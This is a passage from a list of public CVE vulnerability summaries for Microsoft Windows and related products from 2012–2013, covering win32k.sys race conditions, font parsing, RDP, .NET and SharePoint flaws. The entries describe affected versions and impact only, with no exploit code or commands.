[CVE-2013-1275] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1274] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1273] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1272] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1271] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1270] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1269] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1268] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1267] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1266] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1265] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1264] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1263] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1262] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1261] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1260] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1259] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1258] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1257] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1256] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1255] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1254] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1253] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1252] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1251] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1250] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1249] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1248] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data. [CVE-2013-0096] Writer in Microsoft Windows Essentials 2011 and 2012 allows remote attackers to bypass proxy settings and overwrite arbitrary files via crafted URL parameters, aka "Windows Essentials Improper URI Handling Vulnerability." [CVE-2013-0078] The Microsoft Antimalware Client in Windows Defender on Windows 8 and Windows RT uses an incorrect pathname for MsMpEng.exe, which allows local users to gain privileges via a crafted application, aka "Microsoft Antimalware Improper Pathname Vulnerability." [CVE-2013-0077] Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via crafted media content in (1) a media file, (2) a media stream, or (3) a Microsoft Office document, aka "Media Decompression Vulnerability." [CVE-2013-0076] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Reference Count Vulnerability." [CVE-2013-0075] The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (reboot) via a crafted packet that terminates a TCP connection, aka "TCP FIN WAIT Vulnerability." [CVE-2013-0073] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly restrict the privileges of a callback function during object creation, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "WinForms Callback Elevation Vulnerability." [CVE-2013-0013] The SSL provider component in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle encrypted packets, which allows man-in-the-middle attackers to conduct SSLv2 downgrade attacks against (1) SSLv3 sessions or (2) TLS sessions by intercepting handshakes and injecting content, aka "Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability." [CVE-2013-0011] The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted print job, aka "Windows Print Spooler Components Vulnerability." [CVE-2013-0008] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability." [CVE-2013-0005] The WCF Replace function in the Open Data (aka OData) protocol implementation in Microsoft .NET Framework 3.5, 3.5 SP1, 3.5.1, and 4, and the Management OData IIS Extension on Windows Server 2012, allows remote attackers to cause a denial of service (resource consumption and daemon restart) via crafted values in HTTP requests, aka "Replace Denial of Service Vulnerability." [CVE-2013-0002] Buffer overflow in the Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages improper counting of objects during a memory copy operation, aka "WinForms Buffer Overflow Vulnerability." [CVE-2013-0001] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 4, and 4.5 does not properly initialize memory arrays, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a pointer to an unmanaged memory location, aka "System Drawing Information Disclosure Vulnerability." [CVE-2012-4786] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allow remote attackers to execute arbitrary code via a crafted TrueType Font (TTF) file, aka "TrueType Font Parsing Vulnerability." [CVE-2012-4774] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted (1) file name or (2) subfolder name that triggers use of unallocated memory as the destination of a copy operation, aka "Windows Filename Parsing Vulnerability." [CVE-2012-2993] Microsoft Windows Phone 7 does not verify the domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof an SSL server for the (1) POP3, (2) IMAP, or (3) SMTP protocol via an arbitrary valid certificate. [CVE-2012-2897] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT, as used by Google Chrome before 22.0.1229.79 and other programs, do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted TrueType font file, aka "Windows Font Parsing Vulnerability" or "TrueType Font Parsing Vulnerability." [CVE-2012-2556] The OpenType Font (OTF) driver in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to execute arbitrary code via a crafted OpenType font file, aka "OpenType Font Parsing Vulnerability." [CVE-2012-2553] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2551] The server in Kerberos in Microsoft Windows Server 2008 R2 and R2 SP1, and Windows 7 Gold and SP1, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted session request, aka "Kerberos NULL Dereference Vulnerability." [CVE-2012-2530] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2529] Integer overflow in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Windows Kernel Integer Overflow Vulnerability." [CVE-2012-2527] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2526] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP3 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to a deleted object, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-2520] Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 SP2 and SP3 and 2010 SP1, Communicator 2007 R2, Lync 2010 and 2010 Attendee, SharePoint Server 2007 SP2 and SP3 and 2010 SP1, Groove Server 2010 SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2012-1945] Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 allow local users to obtain sensitive information via an HTML document that loads a shortcut (aka .lnk) file for display within an IFRAME element, as demonstrated by a network share implemented by (1) Microsoft Windows or (2) Samba. [CVE-2012-1893] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate callback parameters during creation of a hook procedure, which allows local users to gain privileges via a crafted application, aka "Win32k Incorrect Type Handling Vulnerability." [CVE-2012-1891] Heap-based buffer overflow in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2 and Windows Data Access Components (WDAC) 6.0 allows remote attackers to execute arbitrary code via crafted XML data that triggers access to an uninitialized object in memory, aka "ADO Cachesize Heap Overflow RCE Vulnerability." [CVE-2012-1890] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle keyboard-layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout Vulnerability." [CVE-2012-1870] The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability." [CVE-2012-1868] Race condition in the thread-creation implementation in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application, aka "Win32k.sys Race Condition Vulnerability." [CVE-2012-1867] Integer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted TrueType font file that triggers incorrect memory allocation, aka "Font Resource Refcount Integer Overflow Vulnerability." [CVE-2012-1866] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "Clipboard Format Atom Name Handling Vulnerability." [CVE-2012-1865] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1864. [CVE-2012-1864] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1865. [CVE-2012-1863] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Reflected List Parameter Vulnerability." [CVE-2012-1853] Stack-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Stack Overflow Vulnerability." [CVE-2012-1852] Heap-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Heap Overflow Vulnerability." [CVE-2012-1851] Format string vulnerability in the Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted response, aka "Print Spooler Service Format String Vulnerability." [CVE-2012-1850] The Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle RAP responses, which allows remote attackers to cause a denial of service (service hang) via crafted RAP packets, aka "Remote Administration Protocol Denial of Service Vulnerability." [CVE-2012-1848] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Scrollbar Calculation Vulnerability." [CVE-2012-1537] Heap-based buffer overflow in DirectPlay in DirectX 9.0 through 11.1 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted Office document, aka "DirectPlay Heap Overflow Vulnerability." [CVE-2012-1528] Integer overflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Overflow Vulnerability." [CVE-2012-1527] Integer underflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Underflow Vulnerability." [CVE-2012-1194] The resolver in the DNS Server service in Microsoft Windows Server 2008 before R2 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack. [CVE-2012-0181] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly manage Keyboard Layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout File Vulnerability." [CVE-2012-0180] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode for (1) windows and (2) messages, which allows local users to gain privileges via a crafted application, aka "Windows and Messages Vulnerability." [CVE-2012-0179] Double free vulnerability in tcpip.sys in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that binds an IPv6 address to a local interface, aka "TCP/IP Double Free Vulnerability." [CVE-2012-0178] Race condition in partmgr.sys in Windows Partition Manager in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that makes multiple simultaneous Plug and Play (PnP) Configuration Manager function calls, aka "Plug and Play (PnP) Configuration Manager Vulnerability." [CVE-2012-0176] Double free vulnerability in Microsoft Silverlight 4 before 4.1.10329 on Windows allows remote attackers to execute arbitrary code via vectors involving crafted XAML glyphs, aka "Silverlight Double-Free Vulnerability." [CVE-2012-0175] The Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted name for a (1) file or (2) directory, aka "Command Injection Vulnerability." [CVE-2012-0174] Windows Firewall in tcpip.sys in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly enforce firewall rules for outbound broadcast packets, which allows remote attackers to obtain potentially sensitive information by observing broadcast traffic on a local network, aka "Windows Firewall Bypass Vulnerability." [CVE-2012-0173] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability," a different vulnerability than CVE-2012-0002. [CVE-2012-0165] GDI+ in Microsoft Windows Vista SP2 and Server 2008 SP2 and Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 does not properly validate record types in EMF images, which allows remote attackers to execute arbitrary code via a crafted image, aka "GDI+ Record Type Vulnerability." [CVE-2012-0164] Microsoft .NET Framework 4 does not properly compare index values, which allows remote attackers to cause a denial of service (application hang) via crafted requests to a Windows Presentation Foundation (WPF) application, aka ".NET Framework Index Comparison Vulnerability." [CVE-2012-0159] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview [CVE-2012-0157] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle window messaging, which allows local users to gain privileges via a crafted application that calls the PostMessage function, aka "PostMessage Function Vulnerability." [CVE-2012-0156] DirectWrite in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly render Unicode characters, which allows remote attackers to cause a denial of service (application hang) via a (1) instant message or (2) web site, aka "DirectWrite Application Denial of Service Vulnerability." [CVE-2012-0154] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers keyboard layout errors, aka "Keyboard Layout Use After Free Vulnerability." [CVE-2012-0152] The Remote Desktop Protocol (RDP) service in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (application hang) via a series of crafted packets, aka "Terminal Server Denial of Service Vulnerability." [CVE-2012-0151] The Authenticode Signature Verification function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly validate the digest of a signed portable executable (PE) file, which allows user-assisted remote attackers to execute arbitrary code via a modified file with additional content, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2012-0150] Buffer overflow in msvcrt.dll in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, aka "Msvcrt.dll Buffer Overflow Vulnerability." [CVE-2012-0149] afd.sys in the Ancillary Function Driver in Microsoft Windows Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2012-0148] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 